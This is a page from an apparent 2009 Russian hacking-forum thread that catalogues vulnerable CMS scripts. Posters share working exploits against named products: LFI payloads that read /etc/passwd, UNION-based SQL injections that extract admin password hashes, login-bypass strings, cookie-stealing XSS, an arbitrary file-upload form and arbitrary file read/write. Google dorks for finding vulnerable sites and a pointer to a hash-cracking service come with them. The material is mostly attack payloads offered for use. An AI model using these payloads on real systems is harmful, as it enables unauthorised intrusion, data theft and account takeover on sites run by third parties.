ANTICHAT - Энциклопедия уязвимых скриптов

Страница 11 из 52

« Первая

Последняя »

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)

- - Энциклопедия уязвимых скриптов (https://forum.antichat.xyz/showthread.php?t=19997)

[underwater]

07.04.2009 21:03

emergocolab

LFI

Часть уязвимого кода:

Код:

 if (isset($_GET["sitecode"])) {

include ("conf/global.conf");

$_SESSION["sitecode"]=$_GET["sitecode"];

$_SESSION['sitefolder']='site';

include ("conf/".strtolower($_GET["sitecode"]).".conf");

Exp:

Код:

http://site.ru/index.php?sitecode=../../../../../../../etc/passwd%00

SQL Inj

Exp:

Код:

http://site.ru/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--

XSS

Exp:http://site.ru/?pageid=<script>alert("antichat")</script>

mailbrush

11.04.2009 12:03

Simbas CMS 2.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием default.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

http://www.officetoweb.co.uk/demo/admin/default.asp
username: r0' or ' 1=1--
Password: r0' or ' 1=1--

Демонстрация:
http://www.officetoweb.co.uk/demo/admin/default.asp

© Semu

ph1l1ster

11.04.2009 13:48

OrkZ CMS

XSS: (Все версии)

Код:

index.php?set=news&mc=read&date=<script>alert(document.cookie)</script>

Пример:

Код:

http://orkz.pogran.com/index.php?set=news&mc=read&date=<script>alert(document.cookie)</script>

p.s: cms не использует бд, на php инклуды ещё не смотрел)

[underwater]

12.04.2009 21:23

PHPSurveyor

Офф.сайт - http://www.phpsurveyor.org
В файле templates.php есть такой кусок:

Код:

if ($action == "upload") {

 //Подгружаем файл в директорию :о))

 $the_full_file_path = $publicdir."/templates/".$templatename . "/" .   

        $_FILES['the_file']['name']; 

 if (!@move_uploaded_file($_FILES['the_file']['tmp_name'], $the_full_file_path)) {

  echo "<strong><font color='red'>"._ERROR."</font></strong><br />\n";

  echo _IS_FAILUPLOAD."<br /><br />\n";

  echo "<input $btstyle type='submit' value='"._GO_ADMIN."' onClick=\"window.open('$scriptname', '_top')\">\n";

  echo "</td></tr></table>\n";

  echo "</body>\n</html>\n";

  exit;

 } 

}

Никакой фильтрации, вообще никакой...

Тоесть можем залить файл к ним на сервер и взять пермишенны www.

Формочка будет вылгядеть примерно так:

Код:

</table></form></td></tr><tr><td></td>

<td align='right' valign='top'>

<form enctype='multipart/form-data' name='importsurvey' action='http://victim/phpsurveyor/admin/templates.php' method='post'> <table><tr class='btstyle' >

<td align='right' valign='top' style='border: solid 1 #000080'>

<input class='btstyle' name="the_file" type="file" size="7">

<br /><input type='submit' value='Upload' class='btstyle' >

<input type='hidden' name='editfile' value=''>

<input type='hidden' name='screenname' value='Welcome Page'>

<input type='hidden' name='templatename' value='default'>

<input type='hidden' name='action' value='upload'>

</td>

</table>

</form>

Если все будет хорошо, то ссылка на файл будет выглядеть так:
http://victim/phpsurveyor/templates/default/file.php

К сожалению експлоит был написан до меня, милворм крушит труды% (

halkfild

15.04.2009 14:35

Found : halkfild
Dork : "Powered By Aqua Cms"
Vendor: http://www.aquacms.net/
Advisory URL: http://crackfor.me/bugtraq/aquacms.v1.1.txt
Mail : bugtraq[d0g]crackfor.me

SQL-injections:
Need: magic quotes = off

vuln file: /droplets/functions/base.php
vuln code:

PHP код:


		
			
65:// Check the status of the orders



if(isset($_COOKIE["userSID"])) {

$sqltable = $sitename."_orders";

$selck = $_COOKIE["userSID"];

mysql_select_db($database, $dbconnect);

$query_cartcheck = "SELECT SID FROM $sqltable WHERE SID = '$selck' AND status = 1";    

$cartcheck = mysql_query($query_cartcheck, $dbconnect) or die(mysql_error());

$row_cartcheck = mysql_fetch_assoc($cartcheck);

$totalRows_cartcheck = mysql_num_rows($cartcheck);



if ($totalRows_cartcheck != 0) {

    $user_ip_address = $_SERVER['REMOTE_ADDR'];

    $dt=date("YmdHis"); 

    $UID="$dt$user_ip_address";

    setcookie("userSID", $UID, time()+36000);

}



}

PoC: COOKIE: userSID='[foo]

Auth bypass
Need: magic quotes = off

vuln file: /admin/index.php
vuln code:

PHP код:


		
			
10:

if (isset($_POST['username']) == TRUE) {

    $uusername = $_POST['username'];

    $upassword = $_POST['password'];

    $sqltable = $sitename."_users";

    mysql_select_db($database, $dbconnect);

    $query_getuser = "

    SELECT * 

    FROM $sqltable 

    WHERE username = '$uusername' 

    AND password = '$upassword' 

    AND groups != '' 

    ";

    $getuser = mysql_query($query_getuser, $dbconnect) or die("Unable to select database");

    $row_getuser = mysql_fetch_assoc($getuser);

    $totalRows_getuser = mysql_num_rows($getuser);

    

    if ($totalRows_getuser == 1) {

        $uid = $row_getuser['id'];

        $uun = $row_getuser['username'];

        $ugr = $row_getuser['groups'];

        $setwsuser = $uid.":".$uun.":".$ugr; 

        //setcookie("wsuser", $setwsuser, time()+36000, '/');

        //header("Location: index.php");

    } 

    

// User logon: end

}

PoC: POST: username='[foo]
Exploit: POST: username=crackfor.me'+or+1=1+limit+1+--+

p.s. for cracking md5 hashes use http://crackfor.me - online md5 crack service (:

Twoster

16.04.2009 12:38

Очередная мелкая цмс

Сайт производитель: http://www.adaptcms.com
Продукт: AdaptCMS
Версия: 1.3
SQL-inj
Есть RewriteRule ^page-([^/]+).html$ index.php?view=page&id=$1 , однако есть исходники! =)
Тянем хеш админа

Цитата:

http://www.sp.ru/
index.php?view=page&id=1'+union+select+1,username, 3,password,5,6+from+adaptcms_users--%20

LFI в админке

Цитата:

http://www.sp.ru/admin.php?view=install_plugin&url=../urllist.txt

Цитата:

http://www.sp.ru/admin.php?view=uninstall_plugin2 $_POST['url']=../urllist.txt

Загрузка произвольных файлов

Цитата:

http://www.sp.ru/admin.php?view=upload

P.S. На офф.сайте не работает! =(

Iceangel_

16.04.2009 15:38

Lil' CMS
download: http://www.lilcms.com/lilcms/lilcms2.zip
dork: "Developed from orginal code by Lil' CMS"

Произвольное чтение и запись файлов
уязвимый код:

PHP код:


		
			
if($_POST["select"] && $_POST["Submit"]=="Load") {

//Readfile

$text=file_get_contents($CPATH.$_POST["select"]);

}





if($_POST["editing"] && $_POST["Submit"]=="Update") {

//Write file

$filename = $CPATH.$_POST["editing"];

$text=$_POST["textfield"];

$fp = fopen ($filename, "w");

$text = stripslashes($text);

fwrite($fp, $text);

fclose($fp);

}

эксплуатирование:
достаточно изменить POST-пакет, отсылаемый серверу, т.е. поправить значение переменной select, в случае чтения файла(select=../../../../../../../etc/passwd), и editing, в случае записи в файл(создает файл, если файл с таким именем отсутствует)

(с) Iceangel_

fker	17.04.2009 20:13

webylon cms v 2.5

Found : fker
Vendor: http://webylon.ru/
Type vuln: SQL injection
Vulnerable scripts:
bigimg.cgi
place.cgi
bigimg_galery.cgi
Parameter:id

POC,s:

Код:

http://[target]/bigimg.cgi?id={SQL}

Код:

http://[target]/cgi/place.cgi?id={SQL}

Код:

http://[target]/bigimg_galery.cgi?id={SQL}

sample:
https://forum.antichat.ru/showpost.php?p=1229194&postcount=8915

Iceangel_

19.04.2009 09:32

уязвимости SCMSv1

Уязвимости SCMS
download: http://futurekast.com/fcms/php/SCMSv1.zip
dork: "Powered by SCMSv1"

LFI
уязвимый код:

PHP код:


		
			
    if (!isset($_GET['p'])) { // no page specified -> load default page

        include("../SCMSv1/includes/default.txt");

    } else include("includes/" . $_GET['p'] . ".txt");

эксплуатирование:

Код:

index.php?p=../../../../../../../etc/passwd%00

если стоят мк, используем альтернативу нуллбайту http://raz0r.name/articles/null-byte-alternative/

(с) Iceangel_

ElteRUS

20.04.2009 21:09

Kensei Board 1.1

Kensei Board 1.1 (раньше DestinyBB)
Сайт: http://kenseiboard.com/

Ужасный форум.. его сурсами только детей пугать на ночь :\

SQL-injection
При magic_quotes_gpc=off

Уязвимый код:
forum.php

PHP код:


		
			
$forum = $_GET['f']; //forum number

…

$result = mysql_query( "SELECT * FROM forums_lf2713 WHERE id='$forum'" );

$row = mysql_fetch_array( $result );

$header = $row['header'];

…

<font face='arial' color='#ffffff' class='font1' size='1'>&nbsp;&nbsp;<b>$header</b></font>

Эксплуатация:

Цитата:

site.com/forum.php?f=-1'+union+select+concat_ws(0x2f,email,username,pass word),2,3,4,5,6,7,8,9,10,11,12+from+admins_lf2713--+&o=a7754

Время: 06:11

Страница 11 из 52

« Первая

Последняя »

Показывать 40 сообщений этой темы на одной странице